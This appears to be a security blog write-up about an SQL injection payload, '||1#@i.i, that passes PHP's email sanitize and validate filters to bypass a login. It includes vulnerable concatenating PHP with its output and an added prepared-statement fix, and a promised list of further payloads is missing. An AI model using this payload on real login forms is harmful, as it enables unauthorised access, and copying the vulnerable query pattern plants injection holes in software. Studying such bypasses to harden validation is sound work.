Bypassing FILTER_SANITIZE_EMAIL & FILTER_VALIDATE_EMAIL filters in filter_var for SQL Injection ( xD )
Valid Email !!
While testing a site, I came across its admin panel and got stuck at the login. The common SQLi login bypass payloads weren't working and the WAF was getting in the way.
But after observing the three different errors, "Wrong Username or Password", "Error Occured" and "Invalid Email", I found that `'||1#@i.i` was considered a valid email, bypassed the WAF and boom, I got in :D
After looking at the source code I saw that the FILTER_SANITIZE_EMAIL and FILTER_VALIDATE_EMAIL filters were being used.
`'||1#@i.i` is a valid email according to the FILTER_VALIDATE_EMAIL filter, i.e.:
```php
<?php
$email = "'||1#@i.i";
// FILTER_SANITIZE_EMAIL only removes characters that are not allowed in an address;
// ' | and # are all allowed, so the value comes back unchanged.
$email = filter_var($email, FILTER_SANITIZE_EMAIL);
if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
    echo 'Valid email !!<br>';
    // Vulnerable: the validated value is concatenated straight into the SQL.
    $query = "SELECT * FROM login WHERE email='$email'";
    echo $query;
}
```
will output:
```
Valid email !!
SELECT * FROM login WHERE email=''||1#@i.i'
```
Therefore `'||1#@i.i` can be used as a payload for SQLi login bypass when FILTER_SANITIZE_EMAIL and/or FILTER_VALIDATE_EMAIL are in effect: in MySQL the leading quote closes the string literal, `||1` makes the condition true, and `#` comments out the trailing quote, so the query matches every row.
Some other payloads:
and some others.
FILTER_SANITIZE_EMAIL strips `"`, so `"||1#@i.i` cannot be used.
The single-quote form `'||1#@i.i` survives the filter, so it can be used even when FILTER_SANITIZE_EMAIL and a WAF are in place.
You can try these in the vulnerable login.php file.
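As an added example (not part of the original write-up), here is the same filter_var chain with the query moved to a PDO prepared statement, run against a constructed in-memory SQLite table: the payload above still passes validation, but because it is bound as data rather than concatenated into the SQL it simply matches no row.

```php
<?php
// Added example, not the write-up's code. Assumes PDO with the sqlite driver;
// the login table and its rows are constructed here for the demo.
declare(strict_types=1);

function findUserByEmail(PDO $pdo, string $input): array
{
    // FILTER_SANITIZE_EMAIL keeps ' | and # because they are legal in the
    // local part of an address, so '||1#@i.i comes back unchanged and then
    // passes FILTER_VALIDATE_EMAIL. Validation is not SQL safety.
    $email = filter_var($input, FILTER_SANITIZE_EMAIL);
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return [];
    }

    // The value is bound as a parameter: the database compares it literally
    // against the column and never parses the quote, || or # as SQL.
    $stmt = $pdo->prepare('SELECT id, email FROM login WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE login (id INTEGER PRIMARY KEY, email TEXT NOT NULL)');
$pdo->exec("INSERT INTO login (email) VALUES ('alice@example.com'), ('bob@example.com')");

foreach (['alice@example.com', "'||1#@i.i", 'not an email'] as $input) {
    $rows = findUserByEmail($pdo, $input);
    printf("%-20s -> %d row(s)\n", $input, count($rows));
}
```

The real user still resolves to one row, the injection string to zero rows, and the malformed input is rejected before any query is issued.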
Happy Bypassing ^i^
The contributor(s) cannot be held responsible for what you do with the information and code provided. This is intended for professional and educational purposes only.